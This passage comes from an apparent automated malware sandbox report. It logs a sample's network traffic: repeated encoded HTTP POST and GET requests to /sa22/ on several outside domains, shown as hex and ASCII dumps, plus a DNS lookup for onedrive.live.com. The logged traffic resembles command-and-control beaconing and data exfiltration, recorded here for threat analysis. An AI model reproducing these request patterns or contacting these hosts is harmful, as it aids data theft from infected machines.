7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 35 51 45 34 50 69 68 51 33 61 75 46 72 38 43 41 53 6e 56 73 44 42 64 4b 6e 37 42 32 71 45 42 79 33 6c 73 4a 65 4d 42 65 78 48 45 7a 42 54 59 57 32 79 38 32 78 6c 59 51 72 35 52 50 33 6d 6d 63 7a 70 4d 4e 59 67 6e 34 68 71 6d 6a 54 54 49 67 35 76 75 71 59 33 55 45 48 55 69 75 4b 47 46 75 72 76 69 44 78 75 64 63 6f 51 57 42 4c 67 36 73 4d 57 52 54 64 4f 61 41 53 7e 65 4d 31 66 6d 34 71 52 46 52 6d 6a 34 48 6b 6f 7a 43 68 6b 4a 4a 36 36 58 45 35 47 59 4f 48 38 46 6c 46 64 6c 79 6f 45 55 66 65 7a 72 50 4c 62 75 4f 41 70 4f 71 6a 45 56 41 79 44 61 28 50 36 43 53 33 4e 51 61 44 6c 6a 28 4c 54 42 48 64 37 68 30 31 70 6c 74 59 4f 59 42 45 66 79 36 4c 72 38 48 4c 36 53 69 43 45 4e 30 32 52 70 52 35 6b 2d 72 48 64 56 73 6e 6b 75 6d 51 32 6c 4a 37 35 41 6b 54 43 74 6e 65 63 45 6f 4b 28 37 39 35 34 52 73 54 4a 52 31 4a 64 51 4b 75 50 43 45 5f 61 64 6b 73 72 32 39 55 69 39 66 78 52 39 51 34 36 56 76 45 42 35 76 5a 57 45 33 6c 47 51 61 58 6f 35 58 51 62 70 5a 4b 64 54 44 68 50 67 38 43 6a 4f 50 4c 4e 75 65 55 4f 55 56 44 6f 51 56 4a 6d 31 6f 54 62 63 54 4b 6d 33 79 69 4f 49 4d 63 79 2d 64 37 39 4e 69 35 56 48 62 41 42 72 64 6e 4d 4b 38 36 44 46 71 54 49 50 31 59 4f 67 68 4c 6b 57 61 57 73 6e 59 4c 46 7a 4a 5f 51 57 69 39 32 74 45 52 37 6b 50 45 7e 58 45 5a 68 69 66 4d 28 73 66 6a 54 6c 79 63 28 7a 31 44 56 75 35 76 7a 38 35 55 66 53 33 66 53 31 5a 4d 53 6d 28 70 56 71 6a 38 43 72 6c 69 66 56 4c 33 62 77 34 77 41 75 35 32 7a 48 34 38 43 34 28 51 66 52 35 7a 70 6f 6d 74 71 67 44 72 36 45 64 69 61 79 32 42 33 62 50 63 66 59 47 50 34 59 6f 56 4c 45 6d 4f 59 45 70 5f 7a 37 34 33 71 4e 66 44 55 65 49 68 61 4b 28 66 76 35 7e 4d 44 31 63 73 43 33 53 42 75 72 77 63 28 74 7e 44 49 77 4d 49 51 56 4f 4c 4e 55 47 58 75 6d 59 56 7a 74 6d 61 28 61 43 4d 69 6f 42 53 73 62 58 4d 38 71 71 41 42 62 35 78 31 49 43 79 64 46 63 47 67 37 61 51 55 38 59 53 70 4d 66 38 66 76 73 34 70 63 30 59 56 75 67 53 41 77 33 63 32 50 52 33 64 55 6c 6e 77 38 74 54 44 38 75 4f 65 63 4f 72 69 6a 50 53 38 58 6e 37 38 7a 6b 35 47 37 35 59 77 6b 7e 4e 63 35 45 4a 6e 43 35 6e 61 51 4d 47 33 4f 41 44 6c 36 4a 66 33 42 61 65 51 52 42 65 63 78 79 73 73 43 30 51 47 6d 28 74 62 38 73 51 65 6c 67 38 73 76 64 58 4c 4f 68 76 39 65 35 58 45 32 67 55 33 61 70 78 77 63 77 4e 37 51 33 36 61 6e 46 6f 64 4b 6c 68 6a 69 46 72 4b 35 5a 64 59 67 46 53 65 64 37 4c 61 62 79 70 49 33 69 4b 50 37 56 64 4e 2d 69 43 61 41 44 4f 33 4c 44 69 62 67 54 70 34 58 37 42 79 42 6d 37 6b 35 7a 4d 4d 2d 33 63 55 31 59 55 6b 4b 75 6d 59 36 7a 52 33 71 31 45 6b 35 77 33 38 48 5a 78 4c 65
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.ontariobrokers.infoConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.ontariobrokers.infoUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.ontariobrokers.info/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 46 4f 42 57 76 37 77 75 36 2d 57 38 47 52 48 4e 51 70 51 6a 4a 68 6e 62 67 53 52 4a 56 67 57 6e 31 39 56 65 79 7a 59 72 42 38 6b 70 4a 42 33 45 69 58 76 66 51 57 79 5f 7e 52 6c 66 42 62 38 6f 47 41 36 55 63 7a 42 6d 4e 59 59 6b 79 44 69 6a 6a 44 53 41 67 5a 79 56 73 59 6a 50 45 42 4e 43 75 73 66 57 34 37 6a 69 63 52 47 44 41 39 31 55 57 36 63 4c 72 49 4f 4a 63 5f 50 4f 63 78 36 32 44 7a 4f 31 39 76 77 6a 55 55 28 78 43 6b 35 6d 49 53 45 77 46 4b 65 75 50 61 36 4c 4b 6b 59 42 6b 41 78 74 75 35 45 58 41 2d 72 70 5a 62 72 35 4b 78 38 70 35 43 30 42 41 31 65 69 34 35 36 54 59 51 4e 59 62 79 70 4e 6e 70 28 44 43 63 36 69 77 32 51 47 76 62 6d 33 4e 68 69 75 39 62 32 6d 43 4f 28 58 6d 51 30 6d 79 48 4e 39 43 4e 6f 43 72 55 51 59 6c 47 55 42 38 6e 71 4d 51 61 56 49 6a 52 4f 66 70 65 63 76 71 4b 28 33 31 70 35 75 70 54 4e 65 78 61 56 75 53 39 65 4a 45 73 4f 33 33 65 76 49 35 32 66 4c 5a 52 52 68 45 59 72 69 70 57 74 69 71 65 7e 30 39 46 47 54 65 56 77 77 58 51 61 53 5a 4f 70 35 41 78 72 67 74 48 32 4b 4a 6f 31 79 63 55 50 49 57 54 34 53 63 66 4b 62 6f 54 44 63 53 5f 4b 4e 7a 56 53 49 47 71 57 39 64 61 39 4e 73 70 56 48 43 51 41 46 53 6b 35 41 77 4e 6a 44 68 46 39 30 39 64 62 73 74 5a 74 53 41 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=FOBWv7wu6-W8GRHNQpQjJhnbgSRJVgWn19VeyzYrB8kpJB3EiXvfQWy_~RlfBb8oGA6UczBmNYYkyDijjDSAgZyVsYjPEBNCusfW47jicRGDA91UW6cLrIOJc_POcx62DzO19vwjUU(xCk5mISEwFKeuPa6LKkYBkAxtu5EXA-rpZbr5Kx8p5C0BA1ei456TYQNYbypNnp(DCc6iw2QGvbm3Nhiu9b2mCO(XmQ0myHN9CNoCrUQYlGUB8nqMQaVIjROfpecvqK(31p5upTNexaVuS9eJEsO33evI52fLZRRhEYripWtiqe~09FGTeVwwXQaSZOp5AxrgtH2KJo1ycUPIWT4ScfKboTDcS_KNzVSIGqW9da9NspVHCQAFSk5AwNjDhF909dbstZtSAg).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.zhiguohulian.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.zhiguohulian.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zhiguohulian.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 4a 62 44 6a 44 68 79 57 7e 5a 68 36 55 45 78 74 45 32 30 77 55 6d 30 4f 28 31 4f 34 62 74 38 39 4f 46 62 4c 39 54 59 2d 4b 79 49 7a 51 4c 72 73 55 4a 73 66 6b 77 52 46 4c 57 74 6e 37 4f 48 72 7a 57 45 43 4b 4e 6f 38 78 70 58 6c 46 2d 4d 47 39 49 31 6f 71 55 66 4b 7e 32 4f 43 41 2d 4c 46 46 65 64 34 74 46 7e 55 76 76 6e 4a 32 4f 59 6b 6f 50 42 76 7a 5a 34 6b 4d 5a 4d 77 6a 4a 36 66 70 34 7e 4a 79 77 4b 73 69 59 49 74 63 67 68 46 57 51 73 54 37 4b 68 67 65 74 54 36 78 52 42 59 28 48 50 6b 44 71 41 32 36 43 6f 67 70 4c 48 6c 43 6f 50 37 4c 6b 41 69 73 6e 77 74 6d 6a 59 5a 71 63 35 59 4c 74 71 51 65 6b 4b 56 43 7a 62 33 72 74 32 75 43 6a 75 58 75 75 77 4e 44 41 37 39 4d 7a 6c 5a 77 4f 6a 5a 30 66 4c 65 37 67 68 75 50 45 4e 30 4c 67 4e 57 75 77 72 48 68 59 52 5a 4d 41 4b 44 34 61 79 72 65 4c 69 70 66 35 62 74 6f 4a 37 4d 66 54 42 62 48 63 30 45 55 6e 74 54 46 51 4f 68 44 36 7e 63 37 58 76 49 64 67 69 67 62 45 7a 6d 5a 6a 56 78 44 49 48 38 62 73 65 65 4b 35 6f 64 32 6b 4e 4d 52 4d 44 63 7a 35 5a 50 52 6d 49 2d 4f 38 68 67 70 6c 63 42 69 6f 6e 54 32 6c 77 37 62 77 77 54 59 59 54 5a 76 4e 58 66 57 73 6d 54 63 64 4d 54 47 33 6b 4a 49 54 4a 65 71 55 44 77 28 76 52 58 77 64 64 4e 57 32 79 6e 73 51 29 2e 00 74 5a 74 53 41 67 29 Data Ascii: xL3hLB=JbDjDhyW~Zh6UExtE20wUm0O(1O4bt89OFbL9TY-KyIzQLrsUJsfkwRFLWtn7OHrzWECKNo8xpXlF-MG9I1oqUfK~2OCA-LFFed4tF~UvvnJ2OYkoPBvzZ4kMZMwjJ6fp4~JywKsiYItcghFWQsT7KhgetT6xRBY(HPkDqA26CogpLHlCoP7LkAisnwtmjYZqc5YLtqQekKVCzb3rt2uCjuXuuwNDA79MzlZwOjZ0fLe7ghuPEN0LgNWuwrHhYRZMAKD4ayreLipf5btoJ7MfTBbHc0EUntTFQOhD6~c7XvIdgigbEzmZjVxDIH8bseeK5od2kNMRMDcz5ZPRmI-O8hgplcBionT2lw7bwwTYYTZvNXfWsmTcdMTG3kJITJeqUDw(vRXwddNW2ynsQ).tZtSAg)
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.zhiguohulian.comConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.zhiguohulian.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.zhiguohulian.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 4a 62 44 6a 44 67 72 74 37 70 6c 52 54 77 4a 54 54 33 67 64 64 57 4d 4d 34 46 43 30 62 5f 38 48 44 31 6e 62 39 53 6f 36 43 51 38 68 62 4b 62 73 63 72 55 59 70 77 52 43 4e 57 74 6b 28 4f 44 66 74 78 5a 4f 4b 4d 74 68 78 70 66 6b 4d 66 63 44 7a 34 30 75 73 30 43 5f 32 58 72 65 41 37 53 76 47 34 74 65 6f 46 36 55 72 66 28 50 7a 72 38 5f 38 64 6c 30 36 4e 59 68 66 72 63 35 67 36 7e 4e 70 64 28 65 36 53 7e 75 6d 74 49 6b 51 44 4a 74 48 58 59 57 33 37 46 6e 43 65 75 77 76 43 56 45 34 44 37 57 66 35 59 31 7a 54 41 70 35 62 32 61 45 63 28 6f 4a 31 77 59 73 67 4e 59 71 78 38 49 75 66 4e 51 4d 63 6e 31 57 32 36 4c 65 30 76 76 6d 49 71 66 50 48 53 34 78 36 30 47 45 52 57 39 42 57 35 4a 76 37 47 76 34 4c 6a 61 6f 53 4a 34 43 31 46 47 57 77 39 35 6a 58 32 42 70 72 4a 42 4e 47 53 31 39 36 7a 5f 63 4c 69 54 4c 5a 62 5a 76 4a 28 57 61 41 4a 78 4b 5f 6b 50 55 32 41 50 4c 79 71 66 4e 2d 28 71 35 48 76 2d 46 42 66 66 66 56 48 76 63 6b 39 46 48 49 47 6b 51 50 33 53 4b 35 70 6b 32 6c 4e 6d 44 4a 54 63 68 39 56 36 42 56 77 69 5a 73 68 48 35 6c 4d 48 70 5f 6e 44 32 6b 59 37 61 42 42 4f 5a 72 44 5a 38 4d 6e 59 48 50 7e 54 4a 74 4d 54 4c 58 6c 4f 48 78 6f 55 73 53 4b 58 7e 76 34 69 77 4c 73 2d 59 31 48 73 75 34 76 70 43 32 62 4b 75 68 63 34 34 69 57 68 68 42 39 7a 70 59 4a 47 41 33 6b 70 58 50 64 75 59 73 58 33 79 37 42 65 28 37 73 53 36 43 75 4e 7e 35 6b 77 79 45 68 38 33 51 39 64 54 32 77 58 44 62 76 4b 58 75 41 51 55 55 59 73 69 54 57 5a 49 61 32 44 38 2d 77 53 51 48 7e 6f 39 5a 69 6a 4c 43 35 47 7e 53 41 4d 41 68 72 58 53 35 43 4f 71 49 28 69 4a 59 73 61 30 69 54 4b 72 6a 37 66 7a 57 73 65 6b 7a 34 43 61 6f 4b 77 75 5a 6d 68 4e 53 68 79 4c 65 52 75 63 6e 54 66 36 63 46 4a 76 32 4e 44 5a 56 46 35 54 66 46 43 28 55 67 44 66 32 71 52 4c 74 39 41 73 62 67 59 28 68 73 55 46 67 39 53 52 45 61 6c 43 30 4e 43 49 70 48 43 67 5f 53 53 64 61 53 70 31 59 4c 49 4d 53 64 50 7a 32 36 54 43 65 52 55 35 64 49 5f 48 38 78 41 57 57 4c 35 65 33 6c 36 5a 4d 73 64 5a 38 48 30 6a 41 28 76 6d 75 74 42 69 77 6f 6e 41 2d 30 5a 47 67 30 6c 79 4b 74 41 39 70 6f 7a 36 79 32 4c 7a 38 4a 6f 49 69 38 43 49 34 54 71 56 50 38 33 72 4c 37 6b 70 64 72 69 39 52 37 6d 6a 46 45 44 34 30 6b 73 38 43 44 61 43 66 72 76 66 2d 57 5f 55 53 65 6e 49 65 4a 61 36 51 45 76 64 7a 78 46 43 30 55 46 77 4b 4e 59 57 53 7e 7a 79 76 70 4e 50 51 46 69 63 56 33 4a 55 6a 45 67 58 77 7a 68 43 35 70 6f 58 39 72 31 44 64 62 39 34 62 55 6f 65 63 6d 54 5a 6f 51 65 50 47 49 32 4c 76 51 61 33 58 4c 4a 49 6e 5a 46 52 74 58 79 79 7a 77 47 64 5a 46 57 73 73 58 41 67 4a 59 71 63 47 56 77 32 41 34 47 65 45 43
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.unitedgamesreviews.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.unitedgamesreviews.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 75 72 61 31 4c 79 41 7a 39 34 61 6c 34 4c 34 42 64 67 73 69 48 54 53 51 73 61 62 4d 6e 4d 79 6d 73 53 39 2d 38 69 5a 45 5a 6c 68 46 45 73 62 44 67 4a 45 74 39 50 54 32 69 74 34 46 30 4a 45 61 51 37 54 49 61 73 53 66 56 36 53 62 55 58 33 35 34 4d 6d 63 65 76 33 63 5a 49 7a 6f 33 4d 6b 39 7a 2d 46 68 6b 43 57 69 38 46 73 4d 43 46 64 79 55 48 77 69 76 46 28 78 33 6f 4d 72 52 79 49 74 6b 43 66 57 38 57 64 47 4c 72 67 54 31 79 4e 6f 43 53 50 73 4d 59 68 46 64 35 6e 33 69 68 77 45 72 79 70 58 48 32 70 4f 4d 67 66 62 73 32 39 74 6f 67 5a 4c 34 4c 4e 50 6b 38 6c 7a 68 37 71 41 62 4c 49 43 53 4e 73 57 51 53 4a 6e 44 52 6c 35 6b 4b 76 53 44 61 6f 6b 32 4d 50 73 6b 37 67 57 43 4a 44 66 51 56 59 78 4a 4e 69 5f 4d 66 78 6e 55 58 46 36 46 49 38 59 58 53 70 5f 53 73 32 46 74 5a 56 35 28 62 63 4e 5a 42 33 38 49 41 65 57 52 6f 66 6e 74 71 4f 58 54 50 56 51 48 58 42 2d 42 61 62 55 6f 53 4e 55 4c 52 4e 54 4e 32 41 5a 41 56 7e 49 41 42 37 76 69 4b 55 44 75 38 28 62 6d 67 4c 51 7a 30 34 52 73 43 4d 59 36 64 68 5a 65 73 4a 34 37 39 76 42 47 72 56 52 31 5f 59 6e 4a 75 5a 43 6d 4b 4d 72 74 30 55 30 63 79 51 63 76 77 4a 4e 38 64 41 77 35 73 4c 35 55 37 53 63 49 7a 78 79 7e 35 51 37 72 73 6f 43 49 44 79 33 7e 77 29 2e 00 00 00 00 00 00 00 00 Data Ascii: xL3hLB=ura1LyAz94al4L4BdgsiHTSQsabMnMymsS9-8iZEZlhFEsbDgJEt9PT2it4F0JEaQ7TIasSfV6SbUX354Mmcev3cZIzo3Mk9z-FhkCWi8FsMCFdyUHwivF(x3oMrRyItkCfW8WdGLrgT1yNoCSPsMYhFd5n3ihwErypXH2pOMgfbs29togZL4LNPk8lzh7qAbLICSNsWQSJnDRl5kKvSDaok2MPsk7gWCJDfQVYxJNi_MfxnUXF6FI8YXSp_Ss2FtZV5(bcNZB38IAeWRofntqOXTPVQHXB-BabUoSNULRNTN2AZAV~IAB7viKUDu8(bmgLQz04RsCMY6dhZesJ479vBGrVR1_YnJuZCmKMrt0U0cyQcvwJN8dAw5sL5U7ScIzxy~5Q7rsoCIDy3~w).
Source: global trafficHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeContent-Length: 164312Cache-Control: no-cacheOrigin: http://www.unitedgamesreviews.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.unitedgamesreviews.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 75 72 61 31 4c 33 31 41 78 6f 4f 34 75 75 55 7a 66 52 34 44 64 53 36 46 67 4b 66 36 71 38 36 31 7a 52 6f 68 38 6d 64 41 4d 78 6c 58 4f 73 4c 44 78 72 73 55 6e 5f 54 33 32 64 34 47 77 4a 42 7a 64 4d 50 51 61 6f 4b 6d 56 38 4b 59 64 30 28 34 34 38 6d 4c 66 50 71 76 4d 59 6e 4a 33 4f 41 45 7a 64 70 70 68 43 61 69 69 6c 6b 4f 4e 45 4d 6d 58 46 55 6e 78 45 54 4f 6b 38 55 49 52 69 6b 56 6b 6c 44 6b 73 43 56 45 4d 64 49 61 36 52 55 42 55 52 66 5f 41 6f 6c 43 53 65 76 67 74 6a 55 49 73 7a 70 31 4c 54 64 4e 4d 51 48 76 70 31 6c 36 7e 68 4e 59 35 66 77 2d 6b 39 68 6a 28 6f 7e 64 66 4d 49 4b 43 76 4a 39 61 44 39 6c 42 69 39 68 70 70 48 67 42 61 34 4c 70 5f 61 2d 67 72 4d 44 50 76 66 50 61 56 78 4a 49 2d 32 34 45 4e 35 54 56 77 6c 4d 49 70 4d 6e 4e 45 6f 33 61 66 75 4e 71 62 5a 6c 69 4c 63 75 62 42 33 6f 48 67 66 68 55 6f 54 57 6f 36 7e 35 57 4d 6c 41 48 47 6f 30 45 66 62 32 31 69 30 6f 4e 68 4d 53 56 57 52 6d 4c 6e 53 66 48 43 6d 51 6d 4b 55 6d 6c 61 54 55 6d 67 4c 55 7a 32 51 5f 74 32 63 59 38 4e 42 4b 54 72 64 4b 7a 64 76 6d 44 37 46 54 38 73 63 52 4a 75 42 43 70 62 38 42 74 46 63 30 4b 7a 67 66 73 53 78 4e 7e 74 41 77 30 4d 4b 54 45 4a 4f 55 4a 46 6c 51 31 5a 68 45 70 4c 30 52 4c 68 7a 6c 6b 54 4b 77 54 76 42 47 6e 50 62 41 63 58 45 69 74 62 78 53 72 46 58 73 4d 66 4a 6b 4e 2d 6b 62 31 39 49 73 67 69 68 35 5a 37 34 78 4f 59 38 5a 6a 32 52 72 37 7a 54 41 61 6d 37 70 78 6f 35 67 69 72 6a 6e 68 44 67 53 42 4f 41 5a 32 75 59 78 47 4c 71 5f 31 4f 4a 63 31 4d 47 4b 4e 58 76 43 6e 63 36 36 68 4a 4e 6b 38 61 7a 32 30 49 35 7a 6d 7a 71 6a 4c 58 44 4d 7e 64 6d 76 6e 55 50 6a 55 6e 77 67 79 72 73 63 51 44 6e 67 4f 2d 64 47 4b 6f 66 65 63 39 43 37 78 7a 76 42 4a 6f 6e 68 6f 76 73 66 70 54 6c 69 6d 4f 56 4c 51 6d 73 6d 39 62 41 6a 54 54 44 62 48 71 42 2d 74 41 66 56 73 42 73 32 76 74 57 78 59 66 4b 66 51 42 4d 2d 71 65 6a 57 4c 61 6d 35 64 50 48 5f 6c 6e 66 57 70 57 6c 67 6d 67 6b 2d 4b 57 75 41 4b 70 44 42 43 54 5a 53 62 57 39 6d 68 73 47 2d 36 53 61 62 61 7a 6a 67 41 61 67 68 6c 72 30 54 39 72 66 47 54 4a 78 6b 34 6b 32 59 4e 56 78 54 53 66 28 71 36 44 6d 6b 45 63 48 70 37 36 30 72 56 41 4e 4f 7a 2d 68 59 68 6c 6b 31 63 36 33 37 4e 32 52 4b 70 7a 79 70 66 79 63 68 4f 42 4a 5f 57 78 71 32 50 42 4d 50 74 56 39 4c 4d 4a 75 75 7a 32 59 6d 43 64 4a 63 4a 53 70 39 63 4c 4c 5f 72 5a 4f 77 69 6b 36 45 43 4f 69 54 65 65 4e 35 51 45 7e 58 7a 64 6a 61 42 52 46 53 33 61 63 46 35 4d 57 44 6f 62 6c 76 4d 4b 58 4a 57 59 53 30 59 75 51 74 4e 37 69 68 33 5a 4d 4d 37 30 5a 33 34 42 45 57 42 43 53 75 53 59 52 44 34 78 46 32 38 75 62 6f 4a
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1Host: www.breeze-iwaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=NsNsxeBPlrPiTgS9PP58UUflimdpAUL5lqUDkgQyH8o5OCzmy0StWinhpygoIu1EeSbM&aBR=nzuD_jr HTTP/1.1Host: www.ontariobrokers.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=B5PZdHLghsUOEGl3YThmAxwc5Q2JZtslVwuxmQEXEBgCU6TSZbpNnkclXQwV4rvxtjxB&aBR=nzuD_jr HTTP/1.1Host: www.zhiguohulian.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=mJWPVSoyqfPZs8UJSkt9FmfqvIPNq9yK3Wcj61pPIQpPL4OfnZhXtLvw2+R7wcITKeuf&aBR=nzuD_jr HTTP/1.1Host: www.unitedgamesreviews.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=aVqR6HBe4HPb3lExG0zvWIwAu17MGRwlbJLJc79qbxuvrCEeo+JL0PcaWaEsBxFMbHEl&aBR=nzuD_jr HTTP/1.1Host: www.breeze-iwaki.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /sa22/?xL3hLB=JMM0tJynmL2eFOFZA7GZSDXDp6JdgYgBE5qXu9CROMtt3yZ3f8zQfhoL7xY9xPLh1bda&aBR=nzuD_jr HTTP/1.1Host: www.allixanes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Performs DNS lookupsShow sources
Source: unknownDNS traffic detected: queries for: onedrive.live.com
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /sa22/ HTTP/1.1Host: www.allixanes.comConnection: closeContent-Length: 412Cache-Control: no-cacheOrigin: http://www.allixanes.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.allixanes.com/sa22/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 78 4c 33 68 4c 42 3d 42 75 41 4f 7a 73 53 72 35 76 4f 66 63 38 39 38 62 62 62 6a 43 55 50 5a 67 36 31 30 70 37 4d 51 55 50 50 53 7a 71 4b 4d 4e 4e 77 6f 33 79 52 6e 57 65 4b 47 54 30 45 53 68 52 74 46 38 36 33 4d 6c 61 56 58 44 4d 76 62 77 79 57 6f 65 7a 51 55 69 44 35 43 